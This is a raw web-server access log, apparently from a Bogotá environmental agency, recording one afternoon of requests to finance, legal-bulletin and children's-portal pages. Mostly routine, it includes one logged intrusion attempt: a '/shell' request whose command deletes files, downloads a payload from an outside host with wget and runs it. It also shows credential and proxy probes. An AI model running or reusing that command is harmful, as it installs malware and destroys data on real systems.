201.245.192.253 - - [28/Aug/2022:13:03:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 12285
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 12285
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 39442
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 10464
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 35636
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:03:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [28/Aug/2022:13:04:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2020&resuelve= HTTP/1.1" 200 68506
172.22.2.4 - - [28/Aug/2022:13:03:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.76 - - [28/Aug/2022:13:05:55 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:13:04:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [28/Aug/2022:13:06:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:06:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.60.62 - - [28/Aug/2022:13:04:45 -0500] "GET /Publicaciones/SSFFS-05798.zip HTTP/1.1" 200 22340225
173.252.83.7 - - [28/Aug/2022:13:10:37 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
172.22.2.4 - - [28/Aug/2022:13:09:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Aug/2022:13:11:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:11:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Aug/2022:13:12:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/solicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 88788
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:08 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 82103
172.22.2.4 - - [28/Aug/2022:13:10:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [28/Aug/2022:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:30 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
201.245.192.253 - - [28/Aug/2022:13:12:34 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 95251
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:12:37 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3265
45.95.55.245 - - [28/Aug/2022:13:13:04 -0500] "CONNECT google.com:443 HTTP/1.1" 405 938
201.245.192.253 - - [28/Aug/2022:13:12:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44938
201.245.192.253 - - [28/Aug/2022:13:13:05 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:13:05 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3967
201.245.192.253 - - [28/Aug/2022:13:13:16 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73609
172.22.2.4 - - [28/Aug/2022:13:15:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve= HTTP/1.1" 200 122163
181.62.52.61 - - [28/Aug/2022:13:15:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5517.pdf HTTP/1.1" 200 416409
181.62.52.61 - - [28/Aug/2022:13:15:44 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
5.255.253.170 - - [28/Aug/2022:13:15:55 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:13:16:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:16:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.95.60.62 - - [28/Aug/2022:13:15:07 -0500] "GET /Publicaciones/SSFFS-05800.zip HTTP/1.1" 200 21381792
172.22.2.4 - - [28/Aug/2022:13:15:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
23.224.186.65 - - [28/Aug/2022:13:17:37 -0500] "-" 408 -
66.249.73.191 - - [28/Aug/2022:13:17:58 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:13:16:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
201.245.192.253 - - [28/Aug/2022:13:19:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42919
201.245.192.253 - - [28/Aug/2022:13:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37351
172.22.2.4 - - [28/Aug/2022:13:19:29 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
173.252.95.118 - - [28/Aug/2022:13:21:28 -0500] "GET /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 206 959
216.245.221.92 - - [28/Aug/2022:13:21:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:21:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:13:21:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:22:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
191.95.60.62 - - [28/Aug/2022:13:24:37 -0500] "GET /Publicaciones/SSFFS-05801.zip HTTP/1.1" 200 11923356
5.255.253.166 - - [28/Aug/2022:13:26:23 -0500] "-" 408 -
216.245.221.92 - - [28/Aug/2022:13:26:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:26:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:13:27:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42919
201.245.192.253 - - [28/Aug/2022:13:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37351
207.46.13.36 - - [28/Aug/2022:13:29:26 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
172.22.2.4 - - [28/Aug/2022:13:28:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [28/Aug/2022:13:31:13 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 66671
216.245.221.92 - - [28/Aug/2022:13:31:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:31:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.36 - - [28/Aug/2022:13:32:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1801.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:34:10 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73713
172.22.2.4 - - [28/Aug/2022:13:33:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.62.52.61 - - [28/Aug/2022:13:35:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5607.pdf HTTP/1.1" 200 498408
172.22.2.4 - - [28/Aug/2022:13:33:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
172.22.2.4 - - [28/Aug/2022:13:36:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2022&resuelve= HTTP/1.1" 200 23328
172.22.2.4 - - [28/Aug/2022:13:36:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2022&resuelve= HTTP/1.1" 200 23328
87.250.224.147 - - [28/Aug/2022:13:36:23 -0500] "-" 408 -
173.252.79.19 - - [28/Aug/2022:13:36:27 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
216.245.221.92 - - [28/Aug/2022:13:36:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:36:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:13:37:07 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2019&resuelve= HTTP/1.1" 200 123772
201.245.192.253 - - [28/Aug/2022:13:37:13 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 66671
201.245.192.253 - - [28/Aug/2022:13:37:35 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 73713
201.245.192.253 - - [28/Aug/2022:13:38:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 66671
181.62.52.61 - - [28/Aug/2022:13:39:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0670.pdf HTTP/1.1" 200 360680
157.55.39.80 - - [28/Aug/2022:13:39:12 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12502
201.245.192.253 - - [28/Aug/2022:13:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42919
201.245.192.253 - - [28/Aug/2022:13:39:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37351
172.22.2.4 - - [28/Aug/2022:13:38:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:39:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
186.155.18.170 - - [28/Aug/2022:13:41:36 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
186.155.18.170 - - [28/Aug/2022:13:41:36 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/Infograf%C3%ADa-humedales-actualizada.png HTTP/1.1" 200 588022
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 12388495
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2022/01/Conoce-lo-que-hace-la-Secretar%C3%ADa-de-Ambiente.mp4 HTTP/1.1" 206 5990222
186.155.18.170 - - [28/Aug/2022:13:41:37 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 14696378
172.22.2.4 - - [28/Aug/2022:13:41:46 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
216.245.221.92 - - [28/Aug/2022:13:41:47 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:41:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [28/Aug/2022:13:42:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2021&resuelve= HTTP/1.1" 200 122163
172.22.2.4 - - [28/Aug/2022:13:44:05 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [28/Aug/2022:13:44:11 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 704591
172.22.2.4 - - [28/Aug/2022:13:44:12 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [28/Aug/2022:13:44:12 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:44:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 704591
172.22.2.4 - - [28/Aug/2022:13:44:16 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [28/Aug/2022:13:44:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 704591
172.22.2.4 - - [28/Aug/2022:13:44:21 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
173.252.87.12 - - [28/Aug/2022:13:44:32 -0500] "GET /images/mujeres-cultura-31.jpg HTTP/1.1" 200 33736
172.22.2.4 - - [28/Aug/2022:13:45:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=VERTIMIENTOS&fecha=2020&resuelve= HTTP/1.1" 200 68506
181.62.52.61 - - [28/Aug/2022:13:45:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2616.pdf HTTP/1.1" 200 375511
5.45.207.150 - - [28/Aug/2022:13:46:23 -0500] "-" 408 -
172.22.2.4 - - [28/Aug/2022:13:44:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Aug/2022:13:46:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:13:46:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:45:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
181.62.52.61 - - [28/Aug/2022:13:48:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2581.pdf HTTP/1.1" 200 372979
181.62.52.61 - - [28/Aug/2022:13:48:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/1772.pdf HTTP/1.1" 200 358487
181.62.52.61 - - [28/Aug/2022:13:49:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0044.pdf HTTP/1.1" 200 289756
157.55.39.80 - - [28/Aug/2022:13:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/5780.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Aug/2022:13:51:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:13:51:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:50:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.16 - - [28/Aug/2022:13:53:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=ke6wi7olt62kffpb-h7ukqiu.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
172.22.2.4 - - [28/Aug/2022:13:51:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
207.46.13.115 - - [28/Aug/2022:13:54:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202800-2849.tif HTTP/1.1" 200 6618561
156.220.162.223 - - [28/Aug/2022:13:55:08 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
191.95.60.62 - - [28/Aug/2022:13:55:56 -0500] "GET /Publicaciones/SSFFS-05802.zip HTTP/1.1" 200 563064
191.95.60.62 - - [28/Aug/2022:13:56:11 -0500] "GET /Publicaciones/SSFFS-05802.zip HTTP/1.1" 304 -
87.250.224.43 - - [28/Aug/2022:13:56:22 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:13:56:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:13:56:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:56:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:13:57:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
128.14.209.162 - - [28/Aug/2022:13:59:43 -0500] "GET / HTTP/1.1" 200 319
114.119.140.52 - - [28/Aug/2022:14:00:16 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:14:01:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:14:01:47 -0500] "HEAD / HTTP/1.1" 200 -
163.123.143.129 - - [28/Aug/2022:14:02:21 -0500] "GET /config/getuser?index=0 HTTP/1.1" 404 1018
172.22.2.4 - - [28/Aug/2022:14:02:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:14:03:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
5.45.207.140 - - [28/Aug/2022:14:06:23 -0500] "-" 408 -
191.95.60.62 - - [28/Aug/2022:14:06:28 -0500] "GET /Publicaciones/SSFFS-05803.zip HTTP/1.1" 200 486837
201.245.192.253 - - [28/Aug/2022:14:06:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:14:06:47 -0500] "HEAD / HTTP/1.1" 200 -
191.95.60.62 - - [28/Aug/2022:14:08:32 -0500] "GET /Publicaciones/SSFFS-05804.zip HTTP/1.1" 200 493194
172.22.2.4 - - [28/Aug/2022:14:08:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [28/Aug/2022:14:08:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
207.46.13.144 - - [28/Aug/2022:14:11:12 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/Ficha-comadreja-fauna-27-mayo.jpg HTTP/1.1" 200 68384
66.249.73.164 - - [28/Aug/2022:14:11:32 -0500] "-" 408 -
201.245.192.253 - - [28/Aug/2022:14:11:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [28/Aug/2022:14:11:47 -0500] "HEAD / HTTP/1.1" 200 -
186.102.1.12 - - [28/Aug/2022:14:12:54 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.1.12 - - [28/Aug/2022:14:12:54 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.1.12 - - [28/Aug/2022:14:13:03 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18sk5s4zNf8j2ff2vOMmD01nDccHpmb3oAKNDkIfwdWMBzoDOZVGhGgfRLI93nN2Yy/gwW3OZ6YGKu9t0ETfQ1upLC2f7vDOo3c5GEs74amJ9ajofQ2AWSomsQw2ObA/vfP0YkCv4nMgM4xiUb3onMIv34VKi3HhQGQVVvGd8roCl7hclnUVrtUveraNAHFFUsMT/meaUje+qkJP4qvPGOH+yRdIBCPjQfIiVb086qIUdsuTZX1dGTnIkUGgiry3qjHiUMpHv0k/w==&u=U2FsdGVkX19wGa3rN3XVmWQwTNQLbAEQgryw58UoOuM=&y=U2FsdGVkX1//Q7/V/YVD9AV7XXSPhslB16nau4zV7cQ= HTTP/1.1" 200 25
186.102.1.12 - - [28/Aug/2022:14:13:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19MrSUrvjz7rcL06SBwDk85vbxlS3H7CmiOVVw7Drh8pOIoltWcE8Ev4bojVQrGP9lyTjg43ZfmWo4DGdQ/hP0w5yK1a/UgQrvpuL/LhnioifJ88rMV3JdH8HED4DHOpzajrReF6ytGGHV/JGdWSBo3sOtYr3SAfUMvn9YFoV5957aCNfU+nnNT9xGN3TBorbcMzf8R8IDfYDAFm4tjIvLn0RZ24sqkjwvC6M43LSIcJ+8pnsYa3QzQSVw+OG2KJLNlr4Opj1j3haIN4JJLe5d9O+Bp1UyKuzd53z9KxhlXJR9CVnNtf+S9zsTdvpulgvkEOefIQVyORccb8manMYwrA1qYbgK8LL1Qth2V5EhmEdYgW77Zpaors0PDOxRhutwQMgh0rib3oM6vHdoaN8JpQWPL6/gp3mn6oIe0cnIt6SlOcZuy1SLiafQUrdZs62+YcfrDyCNKorFuwQxHalVJAmMWKO78hEZA/dlkWFpjIfn9dinO6w9XBWFwOgVFjRhX+KAqjcIW09pvQGc5MlnyOcWk8vWG+WmUo99ArQ5Is1s9no7Q22pZxKY+ntc62djxoEJyqYlFoB6a47UFSlEgoCnbWugVlXVhjYJ4hdBIhypRYjaUDFR+Ileu591d8I0nD49/l8ZYdiHIovwXNErAUF/YvqciRG+U/8u4F49GVkyysB7X9hGOSR+DV7nvhKNDrHHdZR6XSHkHs+bkxcSiO6ctGLB5dMejmBhXH0TsKlPD6tLkeKEzkBolIFH/RKeb/ScPJG3pyRQEnlWfFCIYfJxlm6RnBMXq6V7AaVWzMNjj/i4YGs/3n+CCcab3D9yhmzEA9vUl5G06EVp53wY6NkE1pINK5QkDEzzEcTDaiQTpN+uWQuZEToOqcqglygeWt4/+bboS55A2QmWQlJWzrnrr6xga7I9pyynMZTjWHbzYphNRVds8zM0FGrysSKh57S0/ZuTLKuTWxzaNUkAmBoY2cJK+pt0e3uxknVKk4cVELHlJUogPXv4VVbA5vFhrY7qhUFWDLyUf72ZIaWsKUq+qbUqGdPPwyxSSdGj8rmIm/NLBpqi5BDPrB0ThIQrlC+ry4rhfpAXTdKpwJHaXZJbFEDb9TKc1l5UdP0fwLjhQKdqwKO09kbXsaJfGqZ2YjRcBNNgbqq6IetI4k6FgNWUNWOiPOAU+e3D0bC+fNb1YUNGAAnMqf24ZfuOBxqrNo6uZYYEZUb3IWkjTxkojj9XtSCRcaKIe5ID5Ee4HbWAJYH9YsFlatBTwLuBE1HrMJrgaA8V2SnwOm5nmbNoACndYDVSlk0HDryC2WojlTwpk0KeATcuGK1LHu3isI0PhvfqFddgcaJfNB1cOX6cEVfVXuabcmPapXJG4U/y3GmsmZTcKPQO69kDSPrpW/uW3Zl/sqoMb6rnxeBqYP2yOwhl+gPGehJc1sFj/QiCm4mRNShDHGikMrv5q+K2d9pTmbO0/2QaN4CDb7CAlqWqUpeyKygduRue6aUlw2fpuOI3go56yoc4j634LelV16SOnQ8Rc